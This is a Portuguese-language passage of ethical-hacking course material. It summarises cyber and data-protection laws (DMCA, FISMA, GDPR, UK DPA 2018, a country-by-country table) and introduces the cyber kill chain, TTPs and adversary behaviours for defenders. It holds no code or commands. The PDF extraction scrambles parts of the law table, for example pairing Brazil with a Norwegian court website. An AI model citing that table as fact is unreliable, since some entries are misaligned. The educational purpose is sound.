das medidas de proteção tecnológica empregadas pelos proprietários de direitos autorais para proteger suas obras e
contra a remoção ou alteração das informações de gerenciamento de direitos autorais. O DMCA contém cinco títulos:
ÿ Título I: IMPLEMENTAÇÃO DO TRATADO DA OMPI
O Título I implementa os tratados da OMPI. Em primeiro lugar, faz algumas alterações técnicas à legislação
dos Estados Unidos a fim de fornecer as referências e links apropriados para os tratados. Em segundo lugar,
cria duas novas proibições no Título 17 do Código dos Estados Unidos - uma sobre contornar as medidas
tecnológicas usadas pelos proprietários de direitos autorais para proteger suas obras e outra sobre
adulteração de informações de gerenciamento de direitos autorais - e acrescenta recursos civis e penalidades
criminais por violar as proibições. .
ÿ Título II: LIMITAÇÃO DE RESPONSABILIDADE POR VIOLAÇÃO DE DIREITOS AUTORAIS ONLINE
O Título II da DMCA adiciona uma nova seção 512 à Lei de Direitos Autorais para criar quatro novas
limitações de responsabilidade por violação de direitos autorais por provedores de serviços online. Um
provedor de serviços baseia essas limitações nas quatro categorias de conduta a seguir:
o Comunicações transitórias
o Cache do sistema
o O armazenamento direcionado pelo usuário de informações em sistemas ou redes


o Ferramentas de localização de informações
A nova seção 512 também inclui regras especiais relativas à aplicação dessas limitações a instituições
educacionais sem fins lucrativos.
ÿ Título III: MANUTENÇÃO OU REPARAÇÃO DE COMPUTADORES
O Título III do DMCA permite que o proprietário de uma cópia de um programa faça reproduções ou
adaptações quando necessário para usar o programa em conjunto com um computador. A alteração
permite que o proprietário ou locatário de um computador faça ou autorize a criação de uma cópia de
um programa de computador durante a manutenção ou reparo desse computador.
ÿ Título IV: DISPOSIÇÕES DIVERSAS
O Título IV contém seis disposições diversas. A primeira disposição anuncia o Esclarecimento da

Autoridade do Escritório de Direitos Autorais; a segunda dispensa a realização de “gravações efêmeras”;
a terceira promove o estudo por meio da educação a distância; o quarto fornece uma isenção para
bibliotecas e arquivos sem fins lucrativos; a quinta permite emendas de webcasting ao direito de
execução digital em gravações de som e, finalmente, a sexta disposição aborda preocupações sobre a
capacidade de roteiristas, diretores e atores de tela de obter pagamentos residuais pela exploração de
filmes em situações em que o produtor não é mais capaz de fazer esses pagamentos.
ÿ Título V: PROTECÇÃO DE CERTOS DESENHOS ORIGINAIS
O Título V da DMCA dá direito ao Vessel Hull Design Protection Act (VHDPA). Esta lei cria um novo
sistema para proteger os desenhos originais de certos artigos úteis que tornam o artigo atraente ou
distintivo na aparência. Para fins do VHDPA, “artigos úteis” são limitados aos cascos (incluindo os
conveses) de embarcações com comprimento não superior a 200 pés.


Segurança da Informação Federal

Lei de Administração Anna Stewart
(FISMA)
O FISMA fornece uma estrutura abrangente para garantir a eficácia

dos controles de segurança da informação sobre os recursos de
informação que suportam as operações e ativos federais
Inclui
ÿ Padrões para categorizar informações e sistemas de informação por
impacto da missão
ÿ Padrões de requisitos mínimos de segurança da informação e

sistemas de informação
ÿ Orientação para selecionar controles de segurança apropriados para informações

sistemas
ÿ Orientação para avaliar os controles de segurança em sistemas de informação e

determinar a eficácia do controle de segurança
ÿ Orientação para autorização de segurança de sistemas de informação
https:// csrc.nist.gov
A Lei Federal de Gerenciamento de Segurança da Informação (FISMA)
Fonte: https:// csrc.nist.gov
A Lei Federal de Gerenciamento de Segurança da Informação de 2002 foi promulgada para produzir vários padrões
e diretrizes de segurança importantes exigidos pela legislação do Congresso. O FISMA fornece uma estrutura
abrangente para garantir a eficácia dos controles de segurança da informação sobre os recursos de informação
que suportam as operações e ativos federais. Ela exige que cada agência federal desenvolva, documente e
implemente um programa em toda a agência para fornecer segurança da informação para as informações e
sistemas de informação que suportam as operações e ativos da agência, incluindo aqueles fornecidos ou
gerenciados por outra agência, contratante ou outro fonte. A estrutura FISMA inclui:
ÿ Padrões para categorizar informações e sistemas de informação por impacto da missão
ÿ Normas para os requisitos mínimos de segurança da informação e da informação

sistemas
ÿ Orientação para seleção de controles de segurança apropriados para sistemas de informação
ÿ Orientação para avaliar controles de segurança em sistemas de informação e determinar sua

eficácia
ÿ Orientação para a autorização de segurança dos sistemas de informação


ÿ A regulamentação GDPR entrou em vigor em 25 de maio de 2018 e é uma das

leis de privacidade e segurança mais rigorosas do mundo
ÿ O RGPD aplicará multas severas a quem violar as suas normas de privacidade e Dados gerais
segurança, com multas que podem chegar às dezenas de milhões de euros Proteção
Princípios de Proteção de Dados GDPR Regulamento
ÿ Legalidade, equidade e ÿ Precisão (RGPD)
transparência
ÿ Limitação de armazenamento
ÿ Limitação de finalidade
ÿ Integridade e confidencialidade
ÿ Minimização de dados
ÿ Responsabilidade https:// gdpr.eu
Regulamento Geral de Proteção de Dados (GDPR)
Fonte: https:// gdpr.eu
O Regulamento Geral de Proteção de Dados (GDPR) é uma das leis de privacidade e segurança mais rigorosas do
mundo. Embora tenha sido elaborado e aprovado pela União Europeia (UE), impõe obrigações a organizações em
qualquer lugar, desde que tenham como alvo ou coletem dados relacionados a pessoas na UE. O regulamento entrou
em vigor a 25 de maio de 2018. O RGPD aplicará multas severas a quem violar as suas normas de privacidade e
segurança, com multas que podem chegar às dezenas de milhões de euros.
Com o GDPR, a Europa mostra sua posição firme em relação à privacidade e segurança dos dados quando mais
pessoas confiam seus dados a serviços de nuvem e as violações ocorrem diariamente. O regulamento em si é
extenso, abrangente e relativamente leve em detalhes, tornando a conformidade com o GDPR uma perspectiva
assustadora, principalmente para pequenas e médias empresas (PMEs).
Princípios de Proteção de Dados GDPR
O GDPR inclui sete princípios de proteção e responsabilidade descritos no Artigo 5.1-2:
ÿ Licitude, equidade e transparência: O tratamento deve ser lícito, leal e transparente para o titular dos dados.
ÿ Limitação de finalidade: Você deve processar dados para as finalidades legítimas especificadas
explicitamente ao titular dos dados quando você os coletou.
ÿ Minimização de dados: você deve coletar e processar apenas os dados necessários para
as finalidades especificadas.
ÿ Precisão: Você deve manter os dados pessoais precisos e atualizados.


ÿ Limitação de armazenamento: você só pode armazenar dados de identificação pessoal pelo tempo
necessário para o fim especificado.
ÿ Integridade e confidencialidade: O processamento deve ser feito de forma a garantir segurança,

integridade e confidencialidade adequadas (por exemplo, usando criptografia).
ÿ Responsabilidade: O controlador de dados é responsável por demonstrar a conformidade do

GDPR com todos esses princípios.


Lei de Proteção de Dados de 2018 (DPA)
O DPA é uma lei que dispõe sobre a regulamentação do processamento de informações

relativas a indivíduos; fazer provisões em conexão com as funções do Comissário de
Informação sob regulamentos específicos relativos à informação; para fazer provisões
para um código de prática de marketing direto e propósitos relacionados
A DPA protege as pessoas singulares relativamente ao tratamento de dados pessoais,

nomeadamente ao:
Exigir que os dados pessoais sejam processados de forma legal e justa, com base no
consentimento do titular dos dados ou em outra base especificada,
Conferir direitos ao titular dos dados para obter informações sobre o

processamento de dados pessoais e exigir que os dados pessoais inexatos
sejam retificados, e
Atribuir funções ao Comissário, atribuindo ao titular desse cargo a responsabilidade de

fiscalizar e fazer cumprir as suas disposições
https:// www.legislation.gov.uk
Lei de Proteção de Dados de 2018 (DPA)
Fonte: https:// www.legislation.gov.uk
O DPA 2018 estabelece a estrutura da lei de proteção de dados no Reino Unido. Ele atualiza e substitui a Lei de Proteção de
Dados de 1998 e entrou em vigor em 25 de maio de 2018. Foi alterado em 01 de janeiro de 2021 por regulamentos da Lei de
(Retirada) da União Europeia de 2018 para refletir o status do Reino Unido fora da UE.
O DPA é uma lei que dispõe sobre a regulamentação do processamento de informações relativas a indivíduos; fazer provisões
em conexão com as funções do Comissário de Informação sob regulamentos específicos relativos à informação; para fazer
provisões para um código de prática de marketing direto e propósitos relacionados. O DPA também estabelece regras de
proteção de dados separadas para autoridades policiais, estende a proteção de dados a algumas outras áreas, como
segurança e defesa nacional, e define as funções e poderes do Comissário de Informação.
Proteção de dados pessoais
1. O DPA protege os indivíduos em relação ao processamento de dados pessoais, em particular

por:
uma. Exigir que os dados pessoais sejam processados de forma legal e justa, com base nos dados
consentimento do sujeito ou outra base especificada,
b. Conferir direitos ao titular dos dados para obter informações sobre o processamento de dados pessoais e exigir
que os dados pessoais inexatos sejam retificados, e
c. Atribuir funções ao Conselheiro, atribuindo ao titular desse cargo a responsabilidade de fiscalizar e fazer cumprir
as suas disposições.


2. Ao desempenhar funções sob o GDPR, o GDPR aplicado e esta Lei, o Comissário deve
considerar a importância de garantir um nível adequado de proteção de dados pessoais,
levando em consideração os interesses dos titulares dos dados, controladores e outros,
e assuntos de interesse público geral.


Lei cibernética em diferentes países

País
Nome
Leis/Leis Local na rede Internet
A seção 107 da Lei de Direitos Autorais menciona a doutrina do “uso

justo”
https://www.copyright.gov
Lei de limitação de responsabilidade por violação de direitos autorais on-line
A Lei Lanham (Marca Registrada) (15 USC §§ 1051 - 1127) https://www.uspto.gov
A Lei de Privacidade das Comunicações Eletrônicas https://fas.org
Lei de Vigilância de Inteligência Estrangeira https://fas.org
Proteja a Lei da América de 2007 https://www.justice.gov

Estados Unidos
Lei de privacidade de 1974 https://www.justice.gov
Lei Nacional de Proteção da Infraestrutura de Informação de 1996 https://www.nrotc.navy.mil
Lei de Segurança de Computadores de 1987 https://csrc.nist.gov
Lei de Liberdade de Informação (FOIA) https://www.foia.gov
Lei de Fraude e Abuso de Computador https://energy.gov
Lei Federal de Dissuasão de Roubo de Identidade e Assunção https://www.ftc.gov
Lei cibernética em diferentes países (continuação)

Nome do país Leis/Leis Local na rede Internet
A Lei de Marcas Registradas de 1995
A Lei de Patentes de 1990

Austrália https://www.legislation.gov.au
A Lei de Direitos Autorais de 1968
Lei de Crimes Cibernéticos de 2001
Lei de direitos autorais, etc. e marcas registradas (ofensas e execução) de 2002
Lei de Marcas Registradas de 1994 (TMA)
Lei de Uso Indevido de Computadores de 1990
O Regulamento de Redes e Sistemas de Informação 2018

Reino Unido https://www.legislation.gov.uk
Lei de Comunicações de 2003
Regulamentos de Privacidade e Comunicações Eletrônicas (Diretiva CE) de 2003
Lei de Poderes de Investigação de 2016
Regulamento da Lei de Poderes de Investigação de 2000
Lei de direitos autorais da República Popular da China (alterações em 27 de outubro de 2001)

China http://www.npc.gov.cn
Lei de Marcas Registradas da República Popular da China (alterações em 27 de outubro de 2001)
Lei de Patentes (Emenda), 1999, Lei de Marcas Registradas, 1999, Lei de Direitos Autorais, 1957 http://www.ipindia.nic.in
Índia
Lei de Tecnologia da Informação https://www.meity.gov.in
Alemanha Seção 202a. Espionagem de dados, Seção 303a. Alteração de Dados, Seção 303b. Sabotagem de Computador https://www.cybercrimelaw.net


Lei cibernética em diferentes países (continuação)
País
Nome
Itália Artigo 615 ter do Código Penal https://www.cybercrimelaw.net
A Lei de Marcas (Lei nº 127 de 1957), Lei Comercial de Gestão de

Japão https://www.iip.or.jp
Direitos Autorais (4.2.2.3 de 2000)
Lei de Direitos Autorais (RSC, 1985, c. C-42), Lei de Marcas, Seção 342.1 do
Canadá https://laws-lois.justice.gc.ca
Código Penal Canadense
Cingapura Lei de Uso Indevido de Computador https://sso.agc.gov.sg
Lei de Marcas Registradas 194 de 1993 http://www.cipc.co.za

África do Sul
Lei de Direitos Autorais de 1978 https://www.nlsa.ac.za
Lei de Direitos Autorais Nº 3916 https://www.copyright.or.kr

Coreia do Sul
Lei de Proteção de Desenho Industrial https://www.kipo.go.kr
Lei de Direitos Autorais, 30/06/1994 https://www.wipo.int

Bélgica
Hacking de computador https://www.cybercrimelaw.net
Modificação ou alteração não autorizada do sistema de informação

Brasil https://www.domstol.no
Hong Kong Artigo 139 da Lei Básica https://www.basiclaw.gov.hk
Lei cibernética em diferentes países

Cyberlaw ou lei da Internet refere-se a quaisquer leis que tratam da proteção da Internet e outras
tecnologias de comunicação online. O Cyberlaw abrange tópicos como acesso e uso da Internet,
privacidade, liberdade de expressão e jurisdição. As leis cibernéticas fornecem uma garantia da
integridade, segurança, privacidade e confidencialidade das informações em organizações
governamentais e privadas. Essas leis se tornaram proeminentes devido ao aumento do uso da
Internet em todo o mundo. As leis cibernéticas variam de acordo com a jurisdição e o país, portanto,
implementá-las é bastante desafiador. A violação dessas leis resulta em punições que variam de multas a prisão.
País
Nome
A seção 107 da Lei de Direitos Autorais menciona a doutrina do “uso
justo”
https://www.copyright.gov
Lei de limitação de responsabilidade por violação de direitos autorais on-line
A Lei Lanham (Marca Registrada) (15 USC §§ 1051 - 1127) https://www.uspto.gov
A Lei de Privacidade das Comunicações Eletrônicas https://fas.org
Lei de Vigilância de Inteligência Estrangeira https://fas.org

Estados Unidos Proteja a Lei da América de 2007 https://www.justice.gov https://
Lei de privacidade de 1974 www.justice.gov
Lei Nacional de Proteção da Infraestrutura de Informação de

https://www.nrotc.navy.mil
1996
Lei de Segurança de Computadores de 1987 https://csrc.nist.gov
Lei de Liberdade de Informação (FOIA) https://www.foia.gov https://
Lei de Fraude e Abuso de Computador energy.gov


Lei Federal de Dissuasão de Roubo de Identidade e Assunção https://www.ftc.gov
A Lei de Marcas Registradas de 1995
A Lei de Patentes de 1990

Austrália https://www.legislation.gov.au
A Lei de Direitos Autorais de 1968
Lei de Crimes Cibernéticos de 2001
Lei de direitos autorais, etc. e marcas registradas (ofensas e

execução) de 2002
Lei de Marcas Registradas de 1994 (TMA)
Lei de Uso Indevido de Computadores de 1990
O Regulamento de Redes e Sistemas de Informação 2018

Reino Unido https://www.legislation.gov.uk
Lei de Comunicações de 2003
A Política de Privacidade e Comunicações Eletrônicas (EC

Diretiva) Regulamentos de 2003
Lei de Poderes de Investigação de 2016
Regulamento da Lei de Poderes de Investigação de 2000
Lei de Direitos Autorais da República Popular da China

(Alterações em 27 de outubro de 2001)
China http://www.npc.gov.cn
Lei de Marcas Registradas da República Popular da China
(Alterações em 27 de outubro de 2001)
A Lei de Patentes (Emenda), 1999, Lei de Marcas Registradas,

http://www.ipindia.nic.in
Índia 1999, A Lei de Direitos Autorais, 1957
Lei de Tecnologia da Informação https://www.meity.gov.in
Seção 202a. Espionagem de dados, Seção 303a. Alteração de Dados,

Alemanha https://www.cybercrimelaw.net
Seção 303b. Sabotagem de Computador
Itália Artigo 615 ter do Código Penal https://www.cybercrimelaw.net
A Lei de Marcas (Lei nº 127 de 1957), Lei Comercial de Gestão de

Japão https://www.iip.or.jp
Direitos Autorais (4.2.2.3 de 2000)
Lei de Direitos Autorais (RSC, 1985, c. C-42), Lei de Marcas, Seção

Canadá https://laws-lois.justice.gc.ca
342.1 do Código Penal Canadense
Cingapura Lei de Uso Indevido de Computador https://sso.agc.gov.sg http://
Lei de Marcas Registradas 194 de 1993 www.cipc.co.za https://

África do Sul
Lei de Direitos Autorais de 1978 www.nlsa.ac.za
Lei de Direitos Autorais Nº 3916 https://www.copyright.or.kr

Coreia do Sul
Lei de Proteção de Desenho Industrial https://www.kipo.go.kr https://
Lei de Direitos Autorais, 30/06/1994 www.wipo.int

Bélgica
Hacking de computador https://www.cybercrimelaw.net
Modificação ou alteração não autorizada do sistema de

Brasil https://www.domstol.no
informação
Hong Kong Artigo 139 da Lei Básica https://www.basiclaw.gov.hk
Tabela 1.2: Legislação Cibernética em Diferentes Países


Resumo do Módulo
Este módulo discutiu a necessidade de segurança, elementos de segurança da
informação, segurança, funcionalidade e triângulo de usabilidade e desafios de segurança
Ele cobriu motivos, metas e objetivos de ataques de segurança da informação em

detalhes
Também discutiu a classificação de ataques e informações
vetores de ataque de segurança
Finalmente, este módulo terminou com uma discussão detalhada de várias leis
e regulamentos de segurança da informação
O próximo módulo fornecerá uma introdução aos conceitos fundamentais do hacking

ético, como a metodologia da cadeia de destruição cibernética, conceitos de hacking,
classes de hackers e várias fases do ciclo de hacking
Resumo do Módulo
Este módulo discutiu a necessidade de segurança, elementos de segurança da informação, segurança,
funcionalidade e triângulo de usabilidade e desafios de segurança. Ele cobriu os motivos, metas e objetivos
dos ataques de segurança da informação em detalhes. Também discutiu a classificação de ataques e vetores
de ataque à segurança da informação. Finalmente, este módulo terminou com uma discussão detalhada de
várias leis e regulamentos de segurança da informação.
O próximo módulo fornecerá uma introdução aos conceitos fundamentais do hacking ético, como a
metodologia da cadeia de destruição cibernética, conceitos de hacking, classes de hackers e várias fases do
ciclo de hacking.

MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Módulo 02
Fundamentos do Hacking Ético

Fundamentos de Hacking Ético
Ideia criativa
1 Compreendendo a metodologia Cyber Kill Chain
Compreensão de táticas, técnicas e procedimentos

2 (TTPs)
3 Visão geral dos indicadores de comprometimento (IoCs)
4 Visão geral dos conceitos de hacking e classes de hackers
5 Compreendendo as diferentes fases do ciclo de hacking
6 Compreendendo os conceitos de hacking ético e seu escopo
7 Visão geral das ferramentas de hacking ético
Na atual era digital em evolução, uma das principais ameaças que as empresas enfrentam são os criminosos cibernéticos.
O ecossistema de comércio eletrônico em constante evolução introduziu novas tecnologias, como o ambiente de
computação baseado em nuvem. A série de violações de segurança recentes tem alertado as organizações a reconhecerem
a necessidade de sistemas eficientes de segurança da informação. O hacking ético permite que as organizações analisem
objetivamente sua postura de segurança atual. Atualmente, o papel do hacker ético está ganhando destaque. Um hacker
ético penetra intencionalmente na infraestrutura de segurança para identificar e corrigir brechas de segurança.
Este módulo começa com uma introdução à metodologia de cyber kill chain e indicadores de comprometimento (IoCs). Ele
fornece uma visão sobre conceitos de hacking e classes de hackers. Posteriormente, o módulo discute diferentes fases do
ciclo de hacking e termina com uma breve discussão sobre os conceitos, escopo e limitações do hacking ético.
ÿ Explicar a metodologia da cadeia de assassinato
cibernético ÿ Descrever as táticas, técnicas e procedimentos (TTPs) ÿ
Descrever os Indicadores de Compromisso (IoCs) ÿ Explicar os conceitos
de hacking e classes de hackers ÿ Explicar os conceitos e escopo do
hacking ético ÿ Compreender as diferentes fases do hacking ciclo ÿ
Compreender os conceitos de hacking ético e seu alcance
ÿ Conheça as habilidades de um hacker ético
ÿ Compreender várias ferramentas de hacking ético


Fluxo do módulo
3
Entenda diferente 4 5
2 Fases do Ciclo de Hacking
Discutir Hacking Ético

Ético
Conceitos, Escopo e
Discutir conceitos de hacking e Limitações Ferramentas de hacking
1 classes de hackers
Entenda o Cyber Kill

Metodologia da Cadeia
Entenda a Metodologia da Cyber Kill Chain

A cadeia de destruição cibernética é uma maneira eficiente e eficaz de ilustrar como um adversário pode
atacar a organização-alvo. Esse modelo ajuda as organizações a entender as várias ameaças possíveis em
cada estágio de um ataque e as contramedidas necessárias para se defender contra tais ataques.
Além disso, esse modelo fornece aos profissionais de segurança uma visão clara da estratégia de ataque
usada pelo adversário para que diferentes níveis de controles de segurança possam ser implementados para
proteger a infraestrutura de TI da organização.
Esta seção discute a metodologia da cadeia de destruição cibernética, TTPs comuns usados por adversários,
identificação comportamental de adversários e Indicadores de compromisso (IoCs).


Metodologia Cyber Kill Chain

ÿ A metodologia cyber kill chain é um componente da defesa baseada em inteligência para a identificação e
prevenção de atividades de intrusão maliciosa
ÿ Ajuda os profissionais de segurança a entender antecipadamente as táticas, técnicas e procedimentos do adversário
Crie uma carga útil Explorar uma Crie um canal de comando e

maliciosa entregável vulnerabilidade controle para se comunicar e
usando um exploit e um backdoor executando código no sistema da vítima passar dados de um lado para o outro
armamento Exploração Comando e controle
Reconhecimento Entrega Instalação Ações sobre Objetivos

Reúna dados sobre o alvo Enviar pacote armado para a Instalar malware no Executar ações para atingir
para sondar pontos fracos vítima usando e-mail, USB, etc. sistema de destino os objetivos/metas pretendidos
Metodologia Cyber Kill Chain
A metodologia da cadeia de destruição cibernética é um componente da defesa orientada por inteligência para a
identificação e prevenção de atividades de intrusão maliciosa. Essa metodologia ajuda os profissionais de segurança
a identificar as etapas que os adversários seguem para atingir seus objetivos.
A cadeia de mortes cibernéticas é uma estrutura desenvolvida para proteger o ciberespaço com base no conceito
de cadeias de mortes militares. Este método visa melhorar ativamente a detecção e resposta à intrusão. A cadeia
de destruição cibernética está equipada com um mecanismo de proteção de sete fases para mitigar e reduzir as
ameaças cibernéticas.
Segundo a Lockheed Martin, os ataques cibernéticos podem ocorrer em sete fases diferentes, desde o
reconhecimento até o cumprimento final do objetivo. Uma compreensão da metodologia da cadeia de destruição
cibernética ajuda os profissionais de segurança a alavancar os controles de segurança em diferentes estágios de
um ataque e os ajuda a prevenir o ataque antes que ele seja bem-sucedido. Também fornece maior percepção das
fases de ataque, o que ajuda a entender antecipadamente os TTPs do adversário.


A seguir, são discutidas várias fases incluídas na metodologia da cadeia de destruição cibernética:
Figura 2.1: Metodologia da cadeia de destruição cibernética
ÿ Reconhecimento
Um adversário realiza reconhecimento para coletar o máximo possível de informações sobre o alvo para
sondar pontos fracos antes de realmente atacar. Eles procuram informações como informações publicamente
disponíveis na Internet, informações de rede, informações do sistema e informações organizacionais do alvo.
Ao conduzir o reconhecimento em diferentes níveis de rede, o adversário pode obter informações como
bloqueios de rede, endereços IP específicos e detalhes de funcionários. O adversário pode usar ferramentas
automatizadas como portas e serviços abertos, vulnerabilidades em aplicativos e credenciais de login para
obter informações. Essas informações podem ajudar o adversário a obter acesso backdoor à rede de destino.
As atividades do adversário incluem o seguinte:
o Coleta de informações sobre a organização-alvo por meio de pesquisa na Internet ou

através da engenharia social
o Realizar análises de várias atividades online e informações publicamente disponíveis
o Coleta de informações de sites de redes sociais e serviços da web
o Obtenção de informações sobre sites visitados
o Monitoramento e análise do site da organização alvo
o Executando Whois, DNS e pegada de rede
o Realização de varredura para identificar portas e serviços abertos
ÿ Armamento
O adversário analisa os dados coletados na etapa anterior para identificar as vulnerabilidades e técnicas que
podem explorar e obter acesso não autorizado à organização de destino. Com base nas vulnerabilidades
identificadas durante a análise, o adversário seleciona ou cria uma carga útil maliciosa entregue sob medida
(malware de acesso remoto


arma) usando um exploit e um backdoor para enviá-lo para a vítima. Um adversário pode ter como alvo
dispositivos de rede específicos, sistemas operacionais, dispositivos de endpoint ou até mesmo indivíduos
dentro da organização para realizar seu ataque. Por exemplo, o adversário pode enviar um e-mail de phishing
para um funcionário da organização de destino, que pode incluir um anexo malicioso, como um vírus ou
worm que, quando baixado, instala um backdoor no sistema que permite acesso remoto ao adversário.
A seguir estão as atividades do adversário:
o Identificar carga útil de malware apropriada com base na análise
o Criar uma nova carga de malware ou selecionar, reutilizar, modificar os disponíveis

cargas úteis de malware com base na vulnerabilidade identificada
o Criação de uma campanha de e-mail de phishing
o Aproveitamento de exploit kits e botnets
ÿ Entrega
A etapa anterior incluía a criação de uma arma. Sua carga útil é transmitida para a(s) vítima(s) pretendida(s)
como um anexo de e-mail, por meio de um link malicioso em sites ou por meio de um aplicativo da Web ou
unidade USB vulnerável. A entrega é uma etapa chave que mede a eficácia das estratégias de defesa
implementadas pela organização-alvo com base no fato de a tentativa de invasão do adversário ser bloqueada
ou não.
o Envio de e-mails de phishing para funcionários da organização alvo
o Distribuição de unidades USB contendo carga útil maliciosa para funcionários do alvo
organização
o Realizar ataques como watering hole no site comprometido
o Implementar várias ferramentas de hacking contra os sistemas operacionais, aplicativos e

servidores da organização de destino
ÿ Exploração
Depois que a arma é transmitida para a vítima pretendida, a exploração aciona o código malicioso do
adversário para explorar uma vulnerabilidade no sistema operacional, aplicativo ou servidor em um sistema
de destino. Nesse estágio, a organização pode enfrentar ameaças como ataques de autenticação e
autorização, execução de código arbitrário, ameaças de segurança física e configuração incorreta de
segurança.
As atividades do adversário incluem o seguinte:
o Explorar vulnerabilidades de software ou hardware para obter acesso remoto ao alvo

sistema
ÿ Instalação
O adversário baixa e instala mais softwares mal-intencionados no sistema de destino para manter o acesso à
rede de destino por um período prolongado. Eles podem usar o


arma para instalar um backdoor para obter acesso remoto. Após a injeção do código malicioso em um
sistema de destino, o adversário ganha a capacidade de espalhar a infecção para outros sistemas
finais na rede. Além disso, o adversário tenta ocultar a presença de atividades maliciosas de controles
de segurança, como firewalls, usando várias técnicas, como criptografia.
o Baixar e instalar software malicioso, como backdoors
o Obter acesso remoto ao sistema de destino
o Aproveitando vários métodos para manter o backdoor oculto e em execução
o Manter o acesso ao sistema de destino

ÿ Comando e Controle
O adversário cria um canal de comando e controle, que estabelece comunicação bidirecional entre o
sistema da vítima e o servidor controlado pelo adversário para se comunicar e passar dados de um
lado para o outro. Os adversários implementam técnicas como criptografia para ocultar a presença de
tais canais. Usando este canal, o adversário realiza exploração remota no sistema ou rede de destino.
o Estabelecer um canal de comunicação bidirecional entre o sistema da vítima e o

servidor controlado pelo adversário
o Aproveitamento de canais como tráfego da web, comunicação por e-mail e mensagens DNS
o Aplicar técnicas de escalonamento de privilégios
o Ocultar qualquer evidência de comprometimento usando técnicas como criptografia
ÿ Ações sobre Objetivos
O adversário controla o sistema da vítima de um local remoto e finalmente atinge seus objetivos
pretendidos. O adversário obtém acesso a dados confidenciais, interrompe os serviços ou a rede ou
destrói a capacidade operacional do alvo obtendo acesso à sua rede e comprometendo mais sistemas.
Além disso, o adversário pode usar isso como ponto de partida para realizar outros ataques.


Táticas, Técnicas e Procedimentos (TTPs)
O termo Táticas, Técnicas e

Procedimentos (TTPs) refere-se aos
padrões de atividades e métodos
associados a agentes de ameaças
específicos ou grupos de agentes de ameaças
táticas
“Táticas” são as diretrizes que descrevem a maneira como um invasor executa o ataque do começo ao fim
Técnicas
“Técnicas” são os métodos técnicos usados por um invasor para obter resultados intermediários durante o ataque
Procedimentos
“Procedimentos” são abordagens organizacionais que os agentes de ameaças seguem para lançar um ataque
Táticas, Técnicas e Procedimentos (TTPs)
Os termos “táticas, técnicas e procedimentos” referem-se aos padrões de atividades e métodos associados a agentes de
ameaças específicos ou grupos de agentes de ameaças. Os TTPs são úteis na análise de ameaças e no perfil dos
agentes de ameaças e podem ser usados ainda mais para fortalecer a infraestrutura de segurança de uma organização.
A palavra “tática” é definida como uma diretriz que descreve a forma como um atacante realiza seu ataque do começo ao
fim. A palavra “técnicas” é definida como os métodos técnicos usados por um invasor para obter resultados intermediários
durante o ataque. Finalmente, a palavra “procedimentos” é definida como a abordagem organizacional seguida pelos
atores da ameaça para lançar seu ataque. Para entender e se defender contra os agentes de ameaças, é importante
entender os TTPs usados pelos adversários. Compreender as táticas de um invasor ajuda a prever e detectar ameaças
em evolução nos estágios iniciais. Compreender as técnicas utilizadas pelos invasores ajuda a identificar vulnerabilidades
e implementar medidas defensivas com antecedência. Por fim, analisar os procedimentos usados pelos invasores ajuda
a identificar o que o invasor está procurando na infraestrutura da organização de destino.
As organizações devem entender os TTPs para proteger sua rede contra agentes de ameaças e ataques futuros. Os
TTPs permitem que as organizações interrompam os ataques no estágio inicial, protegendo assim a rede contra danos
massivos.
ÿ Táticas
As táticas descrevem a maneira como o agente da ameaça opera durante as diferentes fases de um ataque.
Consiste nas várias táticas usadas para coletar informações para a exploração inicial, realizar escalonamento
de privilégios e movimentação lateral e implantar medidas para acesso persistente ao sistema. Geralmente, os
grupos APT dependem de um certo conjunto de táticas imutáveis, mas em alguns casos, eles se adaptam a
diferentes circunstâncias e alteram


a maneira como executam seus ataques. Portanto, a dificuldade de detectar e atribuir a campanha de
ataque depende das táticas utilizadas para realizar o ataque.
Por exemplo, para obter informações, alguns agentes de ameaças dependem apenas de informações
disponíveis na Internet, enquanto outros podem realizar engenharia social ou usar conexões em
organizações intermediárias. Depois que as informações, como os endereços de e-mail dos funcionários da
organização-alvo, são coletadas, os agentes da ameaça optam por abordar o alvo um por um ou como um
grupo. Além disso, a carga útil projetada pelos invasores pode permanecer constante do início ao fim do
ataque ou pode ser alterada com base no indivíduo visado. Portanto, para entender melhor os atores da
ameaça, as táticas usadas nos estágios iniciais de um ataque devem ser analisadas adequadamente.
ÿ Técnicas
Para lançar um ataque com sucesso, os agentes de ameaças usam várias técnicas durante sua execução.
Essas técnicas incluem exploração inicial, configuração e manutenção de canais de comando e controle,
acesso à infraestrutura de destino e cobertura dos rastros de exfiltração de dados. As técnicas seguidas
pelo agente da ameaça para conduzir um ataque podem variar, mas são muito semelhantes e podem ser
usadas para criação de perfil. Portanto, entender as técnicas usadas nas diferentes fases de um ataque é
essencial para analisar os grupos de ameaças de maneira eficaz.
ÿ Procedimentos
“Procedimentos” envolvem uma sequência de ações executadas pelos atores da ameaça para executar
diferentes etapas do ciclo de vida de um ataque. O número de ações geralmente difere dependendo dos
objetivos do procedimento e do grupo APT. Um ator de ameaça avançado usa procedimentos avançados
que consistem em mais ações do que um procedimento normal para obter o mesmo resultado intermediário.
Isso é feito principalmente para aumentar a taxa de sucesso de um ataque e diminuir a probabilidade de
detecção por mecanismos de segurança.
Uma compreensão e uma análise adequada dos procedimentos seguidos por determinados agentes de
ameaças durante um ataque ajudam as organizações a traçar o perfil dos agentes de ameaças. No estágio
inicial de um ataque, como durante a coleta de informações, é difícil observar o procedimento de um grupo
APT. No entanto, os estágios posteriores de um ataque podem deixar rastros que podem ser usados para
entender os procedimentos seguidos pelo invasor.


Identificação Comportamental do Adversário
ÿ A identificação comportamental do adversário envolve a identificação dos métodos ou técnicas comuns

seguidos por um adversário para lançar ataques ou penetrar na rede de uma organização
ÿ Dá aos profissionais de segurança informações sobre ameaças e explorações futuras
Comportamentos Adversários
Reconhecimento Interno Uso da interface de linha de comando Uso de túnel de DNS
Uso do PowerShell Agente de usuário HTTP Uso do Web Shell
Atividades de proxy não especificadas Servidor de comando e controle Staging de dados
Identificação Comportamental do Adversário
A identificação comportamental do adversário envolve a identificação dos métodos ou técnicas comuns seguidos por
um adversário para lançar ataques para penetrar na rede de uma organização.
Ele fornece aos profissionais de segurança informações sobre ameaças e explorações futuras. Isso os ajuda a planejar
a infraestrutura de segurança de rede e a adaptar uma série de procedimentos de segurança como prevenção contra
vários ataques cibernéticos.
Abaixo estão alguns dos comportamentos de um adversário que podem ser usados para aprimorar os recursos de
detecção de dispositivos de segurança:
ÿ Reconhecimento Interno
Uma vez dentro da rede alvo, o adversário segue várias técnicas e métodos para realizar o reconhecimento
interno. Isso inclui a enumeração de sistemas, hosts, processos, a execução de vários comandos para
